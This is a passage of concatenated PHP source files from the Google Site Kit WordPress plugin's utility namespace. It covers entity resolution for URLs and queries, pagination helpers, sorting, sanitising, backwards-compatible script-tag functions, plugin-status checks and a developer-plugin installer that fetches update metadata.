the regular WordPress home URL and ignore Site Kit-specific details, such * as an alternative "reference site URL". * * Instead of relying on this class directly, use {@see Context::get_reference_entity()} or * {@see Context::get_reference_entity_from_url()}. * * @since 1.15.0 * @access private * @ignore */ final class Entity_Factory { /** * Gets the entity for the current WordPress context, if available. * * @since 1.15.0 * * @return Entity|null The entity for the current context, or null if none could be determined. */ public static function from_context() { global $wp_the_query; // If currently in WP admin, run admin-specific checks. if ( is_admin() ) { $screen = get_current_screen(); if ( ! $screen instanceof WP_Screen || 'post' !== $screen->base ) { return null; } $post = get_post(); if ( $post instanceof WP_Post && self::is_post_public( $post ) ) { return self::create_entity_for_post( $post, 1 ); } return null; } // Otherwise, run frontend-specific `WP_Query` logic. if ( $wp_the_query instanceof WP_Query ) { $entity = self::from_wp_query( $wp_the_query ); $request_uri = Plugin::instance()->context()->input()->filter( INPUT_SERVER, 'REQUEST_URI' ); return self::maybe_convert_to_amp_entity( $request_uri, $entity ); } return null; } /** * Gets the entity for the given URL, if available. * * Calling this method is expensive, so it should only be used in certain admin contexts where this is acceptable. * * @since 1.15.0 * * @param string $url URL to determine the entity from. * @return Entity|null The entity for the URL, or null if none could be determined. */ public static function from_url( $url ) { $query = WP_Query_Factory::from_url( $url ); if ( ! $query ) { return null; } $query->get_posts(); $entity = self::from_wp_query( $query ); return self::maybe_convert_to_amp_entity( $url, $entity ); } /** * Gets the entity for the given `WP_Query` object, if available. * * @since 1.15.0 * * @param WP_Query $query WordPress query object. Must already have run the actual database query. * @return Entity|null The entity for the query, or null if none could be determined. */ public static function from_wp_query( WP_Query $query ) { // A singular post (possibly the static front page). if ( $query->is_singular() ) { $post = $query->get_queried_object(); if ( $post instanceof WP_Post && self::is_post_public( $post ) ) { return self::create_entity_for_post( $post, self::get_query_pagenum( $query, 'page' ) ); } return null; } $page = self::get_query_pagenum( $query ); // The blog. if ( $query->is_home() ) { // The blog is either the front page... if ( $query->is_front_page() ) { return self::create_entity_for_front_blog( $page ); } // ...or it is a separate post assigned as 'page_for_posts'. return self::create_entity_for_posts_blog( $page ); } // A taxonomy term archive. if ( $query->is_category() || $query->is_tag() || $query->is_tax() ) { $term = $query->get_queried_object(); if ( $term instanceof WP_Term ) { return self::create_entity_for_term( $term, $page ); } } // An author archive. if ( $query->is_author() ) { $user = $query->get_queried_object(); if ( $user instanceof WP_User ) { return self::create_entity_for_author( $user, $page ); } } // A post type archive. if ( $query->is_post_type_archive() ) { $post_type = $query->get( 'post_type' ); if ( is_array( $post_type ) ) { $post_type = reset( $post_type ); } $post_type_object = get_post_type_object( $post_type ); if ( $post_type_object instanceof WP_Post_Type ) { return self::create_entity_for_post_type( $post_type_object, $page ); } } // A date-based archive. if ( $query->is_date() ) { $queried_post = self::get_first_query_post( $query ); if ( ! $queried_post ) { return null; } if ( $query->is_year() ) { return self::create_entity_for_date( $queried_post, 'year', $page ); } if ( $query->is_month() ) { return self::create_entity_for_date( $queried_post, 'month', $page ); } if ( $query->is_day() ) { return self::create_entity_for_date( $queried_post, 'day', $page ); } // Time archives are not covered for now. While they can theoretically be used in WordPress, they // aren't fully supported, and WordPress does not link to them anywhere. return null; } return null; } /** * Creates the entity for a given post object. * * @since 1.15.0 * @since 1.68.0 Method access modifier changed to public. * * @param WP_Post $post A WordPress post object. * @param int $page Page number. * @return Entity The entity for the post. */ public static function create_entity_for_post( WP_Post $post, $page ) { $url = self::paginate_post_url( get_permalink( $post ), $post, $page ); return new Entity( urldecode( $url ), array( 'type' => 'post', 'title' => $post->post_title, 'id' => $post->ID, ) ); } /** * Creates the entity for the posts page blog archive. * * This method should only be used when the blog is handled via a separate page, i.e. when 'show_on_front' is set * to 'page' and the 'page_for_posts' option is set. In this case the blog is technically a post itself, therefore * its entity also includes an ID. * * @since 1.15.0 * * @param int $page Page number. * @return Entity|null The entity for the posts blog archive, or null if not set. */ private static function create_entity_for_posts_blog( $page ) { $post_id = (int) get_option( 'page_for_posts' ); if ( ! $post_id ) { return null; } $post = get_post( $post_id ); if ( ! $post ) { return null; } return new Entity( self::paginate_entity_url( get_permalink( $post ), $page ), array( 'type' => 'blog', 'title' => $post->post_title, 'id' => $post->ID, ) ); } /** * Creates the entity for the front page blog archive. * * This method should only be used when the front page is set to display the * blog archive, i.e. is not technically a post itself. * * @since 1.15.0 * * @param int $page Page number. * @return Entity The entity for the front blog archive. */ private static function create_entity_for_front_blog( $page ) { // The translation string intentionally omits the 'google-site-kit' text domain since it should use // WordPress core translations. return new Entity( self::paginate_entity_url( user_trailingslashit( home_url() ), $page ), array( 'type' => 'blog', 'title' => __( 'Home', 'default' ), ) ); } /** * Creates the entity for a given term object, i.e. for a taxonomy term archive. * * @since 1.15.0 * * @param WP_Term $term A WordPress term object. * @param int $page Page number. * @return Entity The entity for the term. */ private static function create_entity_for_term( WP_Term $term, $page ) { // See WordPress's `get_the_archive_title()` function for this behavior. The strings here intentionally omit // the 'google-site-kit' text domain since they should use WordPress core translations. switch ( $term->taxonomy ) { case 'category': $title = $term->name; $prefix = _x( 'Category:', 'category archive title prefix', 'default' ); break; case 'post_tag': $title = $term->name; $prefix = _x( 'Tag:', 'tag archive title prefix', 'default' ); break; case 'post_format': $prefix = ''; switch ( $term->slug ) { case 'post-format-aside': $title = _x( 'Asides', 'post format archive title', 'default' ); break; case 'post-format-gallery': $title = _x( 'Galleries', 'post format archive title', 'default' ); break; case 'post-format-image': $title = _x( 'Images', 'post format archive title', 'default' ); break; case 'post-format-video': $title = _x( 'Videos', 'post format archive title', 'default' ); break; case 'post-format-quote': $title = _x( 'Quotes', 'post format archive title', 'default' ); break; case 'post-format-link': $title = _x( 'Links', 'post format archive title', 'default' ); break; case 'post-format-status': $title = _x( 'Statuses', 'post format archive title', 'default' ); break; case 'post-format-audio': $title = _x( 'Audio', 'post format archive title', 'default' ); break; case 'post-format-chat': $title = _x( 'Chats', 'post format archive title', 'default' ); break; } break; default: $tax = get_taxonomy( $term->taxonomy ); $title = $term->name; $prefix = sprintf( /* translators: %s: Taxonomy singular name. */ _x( '%s:', 'taxonomy term archive title prefix', 'default' ), $tax->labels->singular_name ); } return new Entity( self::paginate_entity_url( get_term_link( $term ), $page ), array( 'type' => 'term', 'title' => self::prefix_title( $title, $prefix ), 'id' => $term->term_id, ) ); } /** * Creates the entity for a given user object, i.e. for an author archive. * * @since 1.15.0 * * @param WP_User $user A WordPress user object. * @param int $page Page number. * @return Entity The entity for the user. */ private static function create_entity_for_author( WP_User $user, $page ) { // See WordPress's `get_the_archive_title()` function for this behavior. The string here intentionally omits // the 'google-site-kit' text domain since it should use WordPress core translations. $title = $user->display_name; $prefix = _x( 'Author:', 'author archive title prefix', 'default' ); return new Entity( self::paginate_entity_url( get_author_posts_url( $user->ID, $user->user_nicename ), $page ), array( 'type' => 'user', 'title' => self::prefix_title( $title, $prefix ), 'id' => $user->ID, ) ); } /** * Creates the entity for a given post type object. * * @since 1.15.0 * * @param WP_Post_Type $post_type A WordPress post type object. * @param int $page Page number. * @return Entity The entity for the post type. */ private static function create_entity_for_post_type( WP_Post_Type $post_type, $page ) { // See WordPress's `get_the_archive_title()` function for this behavior. The string here intentionally omits // the 'google-site-kit' text domain since it should use WordPress core translations. $title = $post_type->labels->name; $prefix = _x( 'Archives:', 'post type archive title prefix', 'default' ); return new Entity( self::paginate_entity_url( get_post_type_archive_link( $post_type->name ), $page ), array( 'type' => 'post_type', 'title' => self::prefix_title( $title, $prefix ), ) ); } /** * Creates the entity for a date-based archive. * * The post specified has to any post from the query, in order to extract the relevant date information. * * @since 1.15.0 * * @param WP_Post $queried_post A WordPress post object from the query. * @param string $type Type of the date-based archive. Either 'year', 'month', or 'day'. * @param int $page Page number. * @return Entity|null The entity for the date archive, or null if unable to parse date. */ private static function create_entity_for_date( WP_Post $queried_post, $type, $page ) { // See WordPress's `get_the_archive_title()` function for this behavior. The strings here intentionally omit // the 'google-site-kit' text domain since they should use WordPress core translations. switch ( $type ) { case 'year': $prefix = _x( 'Year:', 'date archive title prefix', 'default' ); $format = _x( 'Y', 'yearly archives date format', 'default' ); $url_func = 'get_year_link'; $url_func_format = 'Y'; break; case 'month': $prefix = _x( 'Month:', 'date archive title prefix', 'default' ); $format = _x( 'F Y', 'monthly archives date format', 'default' ); $url_func = 'get_month_link'; $url_func_format = 'Y/m'; break; default: $type = 'day'; $prefix = _x( 'Day:', 'date archive title prefix', 'default' ); $format = _x( 'F j, Y', 'daily archives date format', 'default' ); $url_func = 'get_day_link'; $url_func_format = 'Y/m/j'; } $title = get_post_time( $format, false, $queried_post, true ); $url_func_args = get_post_time( $url_func_format, false, $queried_post ); if ( ! $url_func_args ) { return null; // Unable to parse date, likely there is none set. } $url_func_args = array_map( 'absint', explode( '/', $url_func_args ) ); return new Entity( self::paginate_entity_url( call_user_func_array( $url_func, $url_func_args ), $page ), array( 'type' => $type, 'title' => self::prefix_title( $title, $prefix ), ) ); } /** * Checks whether a given post is public, i.e. has a public URL. * * @since 1.15.0 * * @param WP_Post $post A WordPress post object. * @return bool True if the post is public, false otherwise. */ private static function is_post_public( WP_Post $post ) { // If post status isn't 'publish', the post is not public. if ( 'publish' !== get_post_status( $post ) ) { return false; } // If the post type overall is not publicly viewable, the post is not public. if ( ! is_post_type_viewable( $post->post_type ) ) { return false; } // Otherwise, the post is public. return true; } /** * Gets the first post from a WordPress query. * * @since 1.15.0 * * @param WP_Query $query WordPress query object. Must already have run the actual database query. * @return WP_Post|null WordPress post object, or null if none found. */ private static function get_first_query_post( WP_Query $query ) { if ( ! $query->posts ) { return null; } $post = reset( $query->posts ); if ( $post instanceof WP_Post ) { return $post; } if ( is_numeric( $post ) ) { return get_post( $post ); } return null; } /** * Combines an entity title and prefix. * * This is based on the WordPress core function `get_the_archive_title()`. * * @since 1.15.0 * * @param string $title The title. * @param string $prefix The prefix to add, should end in a colon. * @return string Resulting entity title. */ private static function prefix_title( $title, $prefix ) { if ( empty( $prefix ) ) { return $title; } // See WordPress's `get_the_archive_title()` function for this behavior. The string here intentionally omits // the 'google-site-kit' text domain since it should use WordPress core translations. return sprintf( /* translators: 1: Title prefix. 2: Title. */ _x( '%1$s %2$s', 'archive title', 'default' ), $prefix, $title ); } /** * Converts given entity to AMP entity if the given URL is an AMP URL. * * @since 1.42.0 * * @param string $url URL to determine the entity from. * @param Entity $entity The initial entity. * @return Entity The initial or new entity for the given URL. */ private static function maybe_convert_to_amp_entity( $url, $entity ) { if ( is_null( $entity ) || ! defined( 'AMP__VERSION' ) ) { return $entity; } $url_parts = URL::parse( $url ); $current_url = $entity->get_url(); if ( ! empty( $url_parts['query'] ) ) { $url_query_params = array(); wp_parse_str( $url_parts['query'], $url_query_params ); // check if the $url has amp query param. if ( array_key_exists( 'amp', $url_query_params ) ) { $new_url = add_query_arg( 'amp', '1', $current_url ); return self::convert_to_amp_entity( $new_url, $entity ); } } if ( ! empty( $url_parts['path'] ) ) { // We need to correctly add trailing slash if the original url had trailing slash. // That's the reason why we need to check for both version. if ( '/amp' === substr( $url_parts['path'], -4 ) ) { // -strlen('/amp') is -4 $new_url = untrailingslashit( $current_url ) . '/amp'; return self::convert_to_amp_entity( $new_url, $entity ); } if ( '/amp/' === substr( $url_parts['path'], -5 ) ) { // -strlen('/amp/') is -5 $new_url = untrailingslashit( $current_url ) . '/amp/'; return self::convert_to_amp_entity( $new_url, $entity ); } } return $entity; } /** * Converts given entity to AMP entity by changing the entity URL and adding correct mode. * * @since 1.42.0 * * @param string $new_url URL of the new entity. * @param Entity $entity The initial entity. * @return Entity The new entity. */ private static function convert_to_amp_entity( $new_url, $entity ) { $new_entity = new Entity( $new_url, array( 'id' => $entity->get_id(), 'type' => $entity->get_type(), 'title' => $entity->get_title(), 'mode' => 'amp_secondary', ) ); return $new_entity; } /** * Gets the page number for a query, via the specified query var. Defaults to 1. * * @since 1.68.0 * * @param WP_Query $query A WordPress query object. * @param string $query_var Optional. Query var to look for, expects 'paged' or 'page'. Default 'paged'. * @return int The page number. */ private static function get_query_pagenum( $query, $query_var = 'paged' ) { return $query->get( $query_var ) ? (int) $query->get( $query_var ) : 1; } /** * Paginates an entity URL. * * Logic extracted from `paginate_links` in WordPress core. * https://github.com/WordPress/WordPress/blob/7f5d7f1b56087c3eb718da4bd81deb06e077bbbb/wp-includes/general-template.php#L4203 * * @since 1.68.0 * * @param string $url The URL to paginate. * @param int $pagenum The page number to add to the URL. * @return string The paginated URL. */ private static function paginate_entity_url( $url, $pagenum ) { global $wp_rewrite; if ( 1 === $pagenum ) { return $url; } // Setting up default values based on the given URL. $url_parts = explode( '?', $url ); // Append the format placeholder to the base URL. $base = trailingslashit( $url_parts[0] ) . '%_%'; // URL base depends on permalink settings. $format = $wp_rewrite->using_index_permalinks() && ! strpos( $base, 'index.php' ) ? 'index.php/' : ''; $format .= $wp_rewrite->using_permalinks() ? user_trailingslashit( $wp_rewrite->pagination_base . '/%#%', 'paged' ) : '?paged=%#%'; // Array of query args to add. $add_args = array(); // Merge additional query vars found in the original URL into 'add_args' array. if ( isset( $url_parts[1] ) ) { // Find the format argument. $format_parts = explode( '?', str_replace( '%_%', $format, $base ) ); $format_query = isset( $format_parts[1] ) ? $format_parts[1] : ''; wp_parse_str( $format_query, $format_args ); // Find the query args of the requested URL. $url_query_args = array(); wp_parse_str( $url_parts[1], $url_query_args ); // Remove the format argument from the array of query arguments, to avoid overwriting custom format. foreach ( $format_args as $format_arg => $format_arg_value ) { unset( $url_query_args[ $format_arg ] ); } $add_args = array_merge( $add_args, urlencode_deep( $url_query_args ) ); } $link = str_replace( '%_%', $format, $base ); $link = str_replace( '%#%', $pagenum, $link ); if ( $add_args ) { $link = add_query_arg( $add_args, $link ); } return $link; } /** * Paginates a post URL. * * Logic extracted from `_wp_link_page` in WordPress core. * https://github.com/WordPress/WordPress/blob/7f5d7f1b56087c3eb718da4bd81deb06e077bbbb/wp-includes/post-template.php#L1031 * * @since 1.68.0 * * @param string $url The URL to paginate. * @param WP_Post $post The WordPress post object. * @param int $pagenum The page number to add to the URL. * @return string The paginated URL. */ private static function paginate_post_url( $url, $post, $pagenum ) { global $wp_rewrite; if ( 1 === $pagenum ) { return $url; } if ( ! get_option( 'permalink_structure' ) || in_array( $post->post_status, array( 'draft', 'pending' ), true ) ) { $url = add_query_arg( 'page', $pagenum, $url ); } elseif ( 'page' === get_option( 'show_on_front' ) && (int) get_option( 'page_on_front' ) === (int) $post->ID ) { $url = trailingslashit( $url ) . user_trailingslashit( "$wp_rewrite->pagination_base/" . $pagenum, 'single_paged' ); } else { $url = trailingslashit( $url ) . user_trailingslashit( $pagenum, 'single_paged' ); } return $url; } } <?php /** * Class Google\Site_Kit\Core\Util\Sort * * @package Google\Site_Kit\Core\Util * @copyright 2022 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Util; /** * Utility class for sorting lists. * * @since 1.90.0 * @access private * @ignore */ class Sort { /** * Sorts the provided list in a case-insensitive manner. * * @since 1.90.0 * * @param array $list_to_sort The list to sort. * @param string $orderby The field by which the list should be ordered by. * * @return array The sorted list. */ public static function case_insensitive_list_sort( array $list_to_sort, $orderby ) { usort( $list_to_sort, function ( $a, $b ) use ( $orderby ) { if ( is_array( $a ) && is_array( $b ) ) { return strcasecmp( $a[ $orderby ], $b[ $orderby ] ); } if ( is_object( $a ) && is_object( $b ) ) { return strcasecmp( $a->$orderby, $b->$orderby ); } return 0; } ); return $list_to_sort; } } <?php /** * Exit_Handler * * @package Google\Site_Kit\Core\Util * @copyright 2021 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Util; /** * Exit_Handler class. * * @since 1.1.0 * @access private * @ignore */ class Exit_Handler { /** * Invokes the handler. * * @since 1.1.0 */ public function invoke() { $callback = static function () { exit; }; if ( defined( 'GOOGLESITEKIT_TESTS' ) ) { /** * Allows the callback to be filtered during tests. * * @since 1.1.0 * @param \Closure $callback Exit handler callback. */ $callback = apply_filters( 'googlesitekit_exit_handler', $callback ); } if ( $callback instanceof \Closure ) { $callback(); } } } <?php /** * Class Google\Site_Kit\Core\Util\DeveloperPluginInstaller * * @package Google\Site_Kit * @copyright 2021 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Util; use Google\Site_Kit\Context; use Google\Site_Kit\Core\Permissions\Permissions; use Google\Site_Kit\Core\REST_API\REST_Route; use WP_REST_Server; use WP_REST_Request; use WP_REST_Response; /** * Class responsible for providing the helper plugin via the automatic updater. * * @since 1.3.0 */ class Developer_Plugin_Installer { const SLUG = 'google-site-kit-dev-settings'; /** * Plugin context. * * @since 1.3.0 * @var Context */ private $context; /** * Constructor. * * @since 1.3.0 * * @param Context $context Plugin context. */ public function __construct( Context $context ) { $this->context = $context; } /** * Registers functionality through WordPress hooks. * * @since 1.3.0 */ public function register() { // Only filter plugins API response if the developer plugin is not already active. if ( ! defined( 'GOOGLESITEKITDEVSETTINGS_VERSION' ) ) { add_filter( 'plugins_api', function ( $value, $action, $args ) { return $this->plugin_info( $value, $action, $args ); }, 10, 3 ); } add_filter( 'googlesitekit_rest_routes', function ( $routes ) { return array_merge( $routes, $this->get_rest_routes() ); } ); } /** * Gets related REST routes. * * @since 1.3.0 * * @return array List of REST_Route objects. */ private function get_rest_routes() { $can_setup = function () { return current_user_can( Permissions::SETUP ); }; return array( new REST_Route( 'core/site/data/developer-plugin', array( array( 'methods' => WP_REST_Server::READABLE, 'callback' => function () { $is_active = defined( 'GOOGLESITEKITDEVSETTINGS_VERSION' ); $installed = $is_active; $slug = self::SLUG; $plugin = "$slug/$slug.php"; if ( ! $is_active ) { if ( ! function_exists( 'get_plugins' ) ) { require_once ABSPATH . 'wp-admin/includes/plugin.php'; } foreach ( array_keys( get_plugins() ) as $installed_plugin ) { if ( $installed_plugin === $plugin ) { $installed = true; break; } } } // Alternate wp_nonce_url without esc_html breaking query parameters. $nonce_url = function ( $action_url, $action ) { return add_query_arg( '_wpnonce', wp_create_nonce( $action ), $action_url ); }; $activate_url = $nonce_url( self_admin_url( 'plugins.php?action=activate&plugin=' . $plugin ), 'activate-plugin_' . $plugin ); $install_url = $nonce_url( self_admin_url( 'update.php?action=install-plugin&plugin=' . $slug ), 'install-plugin_' . $slug ); return new WP_REST_Response( array( 'active' => $is_active, 'installed' => $installed, 'activateURL' => current_user_can( 'activate_plugin', $plugin ) ? esc_url_raw( $activate_url ) : false, 'installURL' => current_user_can( 'install_plugins' ) ? esc_url_raw( $install_url ) : false, 'configureURL' => $is_active ? esc_url_raw( $this->context->admin_url( 'dev-settings' ) ) : false, ) ); }, 'permission_callback' => $can_setup, ), ) ), ); } /** * Retrieves plugin information data from the Site Kit REST API. * * @since 1.3.0 * * @param false|object|array $value The result object or array. Default false. * @param string $action The type of information being requested from the Plugin Installation API. * @param object $args Plugin API arguments. * @return false|object|array Updated $value, or passed-through $value on failure. */ private function plugin_info( $value, $action, $args ) { if ( 'plugin_information' !== $action || self::SLUG !== $args->slug ) { return $value; } $data = $this->fetch_plugin_data(); if ( ! $data ) { return $value; } $new_data = array( 'slug' => self::SLUG, 'name' => $data['name'], 'version' => $data['version'], 'author' => '<a href="https://opensource.google.com">Google</a>', 'download_link' => $data['download_url'], 'trunk' => $data['download_url'], 'tested' => $data['tested'], 'requires' => $data['requires'], 'requires_php' => $data['requires_php'], 'last_updated' => $data['last_updated'], ); if ( ! empty( $data['icons'] ) ) { $new_data['icons'] = $data['icons']; } if ( ! empty( $data['banners'] ) ) { $new_data['banners'] = $data['banners']; } if ( ! empty( $data['banners_rtl'] ) ) { $new_data['banners_rtl'] = $data['banners_rtl']; } return (object) $new_data; } /** * Gets plugin data from the API. * * @since 1.3.0 * @since 1.99.0 Update plugin data to pull from GCS bucket. * * @return array|null Associative array of plugin data, or null on failure. */ private function fetch_plugin_data() { // phpcs:ignore WordPressVIPMinimum.Functions.RestrictedFunctions.wp_remote_get_wp_remote_get $response = wp_remote_get( 'https://storage.googleapis.com/site-kit-dev-plugins/google-site-kit-dev-settings/updates.json' ); // Retrieve data from the body and decode json format. return json_decode( wp_remote_retrieve_body( $response ), true ); } } <?php /** * Class Google\Site_Kit\Core\Util\Sanitize * * @package Google\Site_Kit\Core\Util * @copyright 2023 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Util; /** * Utility class for sanitizing data. * * @since 1.93.0 * @access private * @ignore */ class Sanitize { /** * Filters empty or non-string elements from a given array. * * @since 1.93.0 * * @param array $elements Array to check. * @return array Empty array or a filtered array containing only non-empty strings. */ public static function sanitize_string_list( $elements = array() ) { if ( ! is_array( $elements ) ) { $elements = array( $elements ); } if ( empty( $elements ) ) { return array(); } $filtered_elements = array_filter( $elements, function ( $element ) { return is_string( $element ) && ! empty( $element ); } ); // Avoid index gaps for filtered values. return array_values( $filtered_elements ); } } <?php /** * Class Google\Site_Kit\Core\Util\BC_Functions * * @package Google\Site_Kit\Core\Util * @copyright 2021 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Util; use BadMethodCallException; use WP_REST_Request; /** * Class for providing backwards compatible core functions, without polyfilling. * * @since 1.7.0 * @access private * @ignore */ class BC_Functions { /** * Proxies calls to global functions, while falling back to the internal method by the same name. * * @since 1.7.0 * * @param string $function_name Function name to call. * @param array $arguments Arguments passed to function. * @return mixed * @throws BadMethodCallException Thrown if no method exists by the same name as the function. */ public static function __callStatic( $function_name, $arguments ) { if ( function_exists( $function_name ) ) { return call_user_func_array( $function_name, $arguments ); } if ( method_exists( __CLASS__, $function_name ) ) { return self::{ $function_name }( ...$arguments ); } throw new BadMethodCallException( "$function_name does not exist." ); } /** * Basic implementation of the wp_sanitize_script_attributes function introduced in the WordPress version 5.7.0. * * @since 1.41.0 * * @param array $attributes Key-value pairs representing `<script>` tag attributes. * @return string String made of sanitized `<script>` tag attributes. */ protected static function wp_sanitize_script_attributes( $attributes ) { $attributes_string = ''; foreach ( $attributes as $attribute_name => $attribute_value ) { if ( is_bool( $attribute_value ) ) { if ( $attribute_value ) { $attributes_string .= ' ' . esc_attr( $attribute_name ); } } else { $attributes_string .= sprintf( ' %1$s="%2$s"', esc_attr( $attribute_name ), esc_attr( $attribute_value ) ); } } return $attributes_string; } /** * A fallback for the wp_get_script_tag function introduced in the WordPress version 5.7.0. * * @since 1.41.0 * * @param array $attributes Key-value pairs representing `<script>` tag attributes. * @return string String containing `<script>` opening and closing tags. */ protected static function wp_get_script_tag( $attributes ) { return sprintf( "<script %s></script>\n", self::wp_sanitize_script_attributes( $attributes ) ); } /** * A fallback for the wp_print_script_tag function introduced in the WordPress version 5.7.0. * * @since 1.41.0 * * @param array $attributes Key-value pairs representing `<script>` tag attributes. */ protected static function wp_print_script_tag( $attributes ) { echo self::wp_get_script_tag( $attributes ); // phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped } /** * A fallback for the wp_get_inline_script_tag function introduced in the WordPress version 5.7.0. * * @since 1.41.0 * * @param string $javascript Inline JavaScript code. * @param array $attributes Optional. Key-value pairs representing `<script>` tag attributes. * @return string String containing inline JavaScript code wrapped around `<script>` tag. */ protected static function wp_get_inline_script_tag( $javascript, $attributes = array() ) { $javascript = "\n" . trim( $javascript, "\n\r " ) . "\n"; return sprintf( "<script%s>%s</script>\n", self::wp_sanitize_script_attributes( $attributes ), $javascript ); } /** * A fallback for the wp_get_inline_script_tag function introduced in the WordPress version 5.7.0. * * @since 1.41.0 * * @param string $javascript Inline JavaScript code. * @param array $attributes Optional. Key-value pairs representing `<script>` tag attributes. */ protected static function wp_print_inline_script_tag( $javascript, $attributes = array() ) { echo self::wp_get_inline_script_tag( $javascript, $attributes ); // phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped } /** * A fallback for the wp_get_sidebar function introduced in the WordPress version 5.9.0. * * Retrieves the registered sidebar with the given ID. * * @since 1.86.0 * * @global array $wp_registered_sidebars The registered sidebars. * * @param string $id The sidebar ID. * @return array|null The discovered sidebar, or null if it is not registered. */ protected static function wp_get_sidebar( $id ) { global $wp_registered_sidebars; foreach ( (array) $wp_registered_sidebars as $sidebar ) { if ( $sidebar['id'] === $id ) { return $sidebar; } } if ( 'wp_inactive_widgets' === $id ) { return array( 'id' => 'wp_inactive_widgets', 'name' => __( 'Inactive widgets', 'default' ), ); } return null; } } <?php /** * Class Google\Site_Kit\Core\Util\Plugin_Status * * @package Google\Site_Kit * @copyright 2025 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Util; /** * Utility class for checking the status of plugins. * * @since 1.148.0 * @access private * @ignore */ class Plugin_Status { /** * Determines whether a plugin is installed. * * @since 1.148.0 * * @param string|callable $plugin_or_predicate String plugin file to check or * a function that accepts plugin header data and plugin file name to test. * * @return bool|string Boolean if checking by plugin file or plugin not found, * String plugin file if checking using a predicate function. */ public static function is_plugin_installed( $plugin_or_predicate ) { if ( ! function_exists( 'get_plugins' ) ) { require_once ABSPATH . 'wp-admin/includes/plugin.php'; } if ( is_string( $plugin_or_predicate ) ) { return array_key_exists( $plugin_or_predicate, get_plugins() ); } if ( ! is_callable( $plugin_or_predicate ) ) { return false; } foreach ( get_plugins() as $plugin_file => $data ) { if ( $plugin_or_predicate( $data, $plugin_file ) ) { return $plugin_file; } } return false; } } <?php /** * Class Google\Site_Kit\Core\Util\Block_Support * * @package Google\Site_Kit\Core\Util * @copyright 2025 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Util; /** * Utility class for block support checks. * * @since 1.148.0 * @access private * @ignore */ class Block_Support { /** * Checks whether blocks are supported in Site Kit based on WordPress version. * * We currently require version WP 5.8 or higher to support blocks, as this is the version * where the `block.json` configuration format was introduced. * * @since 1.148.0 * * @return bool True if blocks are supported, false otherwise. */ public static function has_block_support() { return (bool) version_compare( '5.8', get_bloginfo( 'version' ), '<=' ); } /** * Checks whether Block API version 3 is supported based on WordPress version. * * Block API version 3 introduces iframe rendering for blocks in the editor. * This is supported starting with WordPress 6.3. * * @since 1.166.0 * * @return bool True if Block API version 3 is supported, false otherwise. */ public static function has_block_api_version_3_support() { return (bool) version_compare( '6.3', get_bloginfo( 'version' ), '<=' ); } } <?php /** * Class Google\Site_Kit\Core\Util\URL * * @package Google\Site_Kit\Core\Util * @copyright 2023 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Util; /** * Class for custom date parsing methods. * * @since 1.99.0 * @access private * @ignore */ class Date { /** * Parses a date range string into a start date and an end date. * * @since 1.99.0 * * @param string $range Date range string. Either 'last-7-days', 'last-14-days', 'last-90-days', or * 'last-28-days' (default). * @param string $multiplier Optional. How many times the date range to get. This value can be specified if the * range should be request multiple times back. Default 1. * @param int $offset Days the range should be offset by. Default 1. Used by Search Console where * data is delayed by two days. * @param bool $previous Whether to select the previous period. Default false. * @return array List with two elements, the first with the start date and the second with the end date, both as 'Y-m-d'. */ public static function parse_date_range( $range, $multiplier = 1, $offset = 1, $previous = false ) { preg_match( '*-(\d+)-*', $range, $matches ); $number_of_days = $multiplier * ( isset( $matches[1] ) ? $matches[1] : 28 ); // Calculate the end date. For previous period requests, offset period by the number of days in the request. $end_date_offset = $previous ? $offset + $number_of_days : $offset; $date_end = gmdate( 'Y-m-d', strtotime( $end_date_offset . ' days ago' ) ); // Set the start date. $start_date_offset = $end_date_offset + $number_of_days - 1; $date_start = gmdate( 'Y-m-d', strtotime( $start_date_offset . ' days ago' ) ); return array( $date_start, $date_end ); } } <?php /** * Class Google\Site_Kit\Core\Util\Google_Icon * * @package Google\Site_Kit * @copyright 2021 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Util; /** * Class for the Google SVG Icon * * @since 1.28.0 * @access private * @ignore */ final class Google_Icon { /** * We use fill="white" as a placeholder attribute that we replace in with_fill() * to match the colorscheme that the user has set. * * See the comment in includes/Core/Admin/Screen.php::add() for more information. */ const XML = '<svg width="20" height="20" viewbox="0 0 20 20" xmlns="http://www.w3.org/2000/svg"><path fill="white" d="M17.6 8.5h-7.5v3h4.4c-.4 2.1-2.3 3.5-4.4 3.4-2.6-.1-4.6-2.1-4.7-4.7-.1-2.7 2-5 4.7-5.1 1.1 0 2.2.4 3.1 1.2l2.3-2.2C14.1 2.7 12.1 2 10.2 2c-4.4 0-8 3.6-8 8s3.6 8 8 8c4.6 0 7.7-3.2 7.7-7.8-.1-.6-.1-1.1-.3-1.7z" fillrule="evenodd" cliprule="evenodd"></path></svg>'; /** * Returns a base64 encoded version of the SVG. * * @since 1.28.0 * * @param string $source SVG icon source. * @return string Base64 representation of SVG */ public static function to_base64( $source = self::XML ) { return base64_encode( $source ); } /** * Returns SVG XML with fill color replaced. * * @since 1.28.0 * * @param string $color Any valid color for css, either word or hex code. * @return string SVG XML with the fill color replaced */ public static function with_fill( $color ) { return str_replace( 'white', esc_attr( $color ), self::XML ); } } <?php /** * Migration for Audience Settings. * * @package Google\Site_Kit\Core\Util * @copyright 2025 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace 